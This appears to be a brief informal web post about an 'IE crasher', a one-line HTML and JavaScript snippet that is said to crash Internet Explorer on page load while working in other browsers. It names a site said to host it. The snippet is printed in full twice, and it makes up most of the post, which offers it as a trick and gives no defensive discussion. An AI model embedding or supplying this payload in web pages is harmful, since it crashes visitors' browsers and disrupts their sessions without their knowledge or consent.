IE crasher
A single Line of code can crash IE while trying to open. while it can work flawlessly in other browsers.
<script>for(x in document.write){document.write(x);}</script><input type crash>
This line is the IE crasher
http://www.crashie.com/ this site has this code . So it wont work in IE. Trying to open this site in IE crashes it, but works flawlessly in other browsers..
for(x in document.write){document.write(x);}